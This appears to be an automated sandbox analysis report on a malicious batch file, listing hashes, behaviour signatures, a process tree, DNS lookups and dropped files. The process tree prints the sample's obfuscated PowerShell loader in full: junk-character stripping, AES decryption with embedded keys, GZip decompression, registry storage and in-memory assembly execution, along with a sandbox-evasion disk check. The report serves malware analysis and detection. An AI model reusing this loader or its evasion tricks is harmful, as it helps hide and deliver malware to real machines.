Analysis
-
max time kernel
17s -
max time network
4s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
17/01/2025, 19:00 UTC
Static task
static1
Behavioral task
behavioral1
Sample
filetest.bat
Resource
win10ltsc2021-20250113-en
General
-
Target
filetest.bat
-
Size
7.9MB
-
MD5
f88d18fc65296a1ed460e40a352e3045
-
SHA1
f6d9d94da2f11d0485ca057a057a06ac492bde8c
-
SHA256
f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f
-
SHA512
f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367
-
SSDEEP
49152:h4ANZ4/rNl/dichvhGpPK7kMes5mmCq/BWZHtPrBe7XTADqoh6EKQJS2H/WkTb/2:6
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3780 created 624 3780 powershell.exe 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3780 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3780 set thread context of 3572 3780 powershell.exe 90 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 4672 powershell.exe 4672 powershell.exe 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 3572 dllhost.exe 3572 dllhost.exe 3572 dllhost.exe 3572 dllhost.exe 3572 dllhost.exe 3572 dllhost.exe 3572 dllhost.exe 3572 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4672 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 3572 dllhost.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 236 wrote to memory of 4672 236 cmd.exe 85 PID 236 wrote to memory of 4672 236 cmd.exe 85 PID 4672 wrote to memory of 4916 4672 powershell.exe 87 PID 4672 wrote to memory of 4916 4672 powershell.exe 87 PID 236 wrote to memory of 724 236 cmd.exe 88 PID 236 wrote to memory of 724 236 cmd.exe 88 PID 236 wrote to memory of 3780 236 cmd.exe 89 PID 236 wrote to memory of 3780 236 cmd.exe 89 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3780 wrote to memory of 3572 3780 powershell.exe 90 PID 3572 wrote to memory of 624 3572 dllhost.exe 5 PID 3572 wrote to memory of 676 3572 dllhost.exe 7 PID 3572 wrote to memory of 968 3572 dllhost.exe 12 PID 3572 wrote to memory of 396 3572 dllhost.exe 13 PID 3572 wrote to memory of 444 3572 dllhost.exe 14 PID 3572 wrote to memory of 540 3572 dllhost.exe 15 PID 3572 wrote to memory of 1028 3572 dllhost.exe 16 PID 3572 wrote to memory of 1056 3572 dllhost.exe 17 PID 3572 wrote to memory of 1096 3572 dllhost.exe 18 PID 3572 wrote to memory of 1168 3572 dllhost.exe 19 PID 3572 wrote to memory of 1184 3572 dllhost.exe 20 PID 3572 wrote to memory of 1192 3572 dllhost.exe 21 PID 3572 wrote to memory of 1280 3572 dllhost.exe 23 PID 3572 wrote to memory of 1380 3572 dllhost.exe 24 PID 3572 wrote to memory of 1400 3572 dllhost.exe 25 PID 3572 wrote to memory of 1420 3572 dllhost.exe 26 PID 3572 wrote to memory of 1504 3572 dllhost.exe 27 PID 3572 wrote to memory of 1512 3572 dllhost.exe 28 PID 3572 wrote to memory of 1528 3572 dllhost.exe 29 PID 3572 wrote to memory of 1676 3572 dllhost.exe 30 PID 676 wrote to memory of 3656 676 lsass.exe 86 PID 3572 wrote to memory of 1692 3572 dllhost.exe 31 PID 3572 wrote to memory of 1852 3572 dllhost.exe 32 PID 676 wrote to memory of 2280 676 lsass.exe 40 PID 3572 wrote to memory of 1860 3572 dllhost.exe 33 PID 676 wrote to memory of 3656 676 lsass.exe 86 PID 3572 wrote to memory of 1876 3572 dllhost.exe 34 PID 3572 wrote to memory of 1916 3572 dllhost.exe 35 PID 676 wrote to memory of 2280 676 lsass.exe 40 PID 3572 wrote to memory of 1932 3572 dllhost.exe 36
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1028
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5af75819-01cb-4f3c-ab82-4a82f9aa62b0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3572
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\filetest.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A3⤵PID:4916
-
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug '$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Users\Admin\AppData\Local\Temp\filetest.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));2⤵PID:724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\filetest.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat3⤵PID:2328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "3⤵PID:712
-
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3656
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request68.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request50.196.221.88.in-addr.arpaIN PTRResponse50.196.221.88.in-addr.arpaIN PTRa88-221-196-50deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request218.99.81.104.in-addr.arpaIN PTRResponse218.99.81.104.in-addr.arpaIN PTRa104-81-99-218deploystaticakamaitechnologiescom
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
68.32.126.40.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
50.196.221.88.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
218.99.81.104.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD587c29700d926d094566f97a4ca94661f
SHA1edbc46e5510447273bbaae1a5d13e6984b003594
SHA256b254694891c8c9da1394c3c469cee50f145c72582e6d1cf0045cab4e72f48e7f
SHA5120c6ba3544daa14af98f338fa24d01624f9e93f9633b2bd6b4c031f7f1ecd4265dddde4469a8b96e81d802401ec8f3ba1d0120afe53ee6fa5345f9f3f7ab94290
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.3MB
MD589008f5ff31d97989dc8683d8637fb9a
SHA12643e07ddeee6757a31725fdd76aa5670f0b257e
SHA2560789be73a9680c5407f9584b0a5e9a521b328a4e8d7bd1f0ad4076699ca99f80
SHA512c295440add226d0b5f930e7c318ce542045e1851744dec6663eed62029bbfcf63361f8a70f56d0f4d7d515eabcaaa73e95078f8b44182e2efd14d61fbb4505b1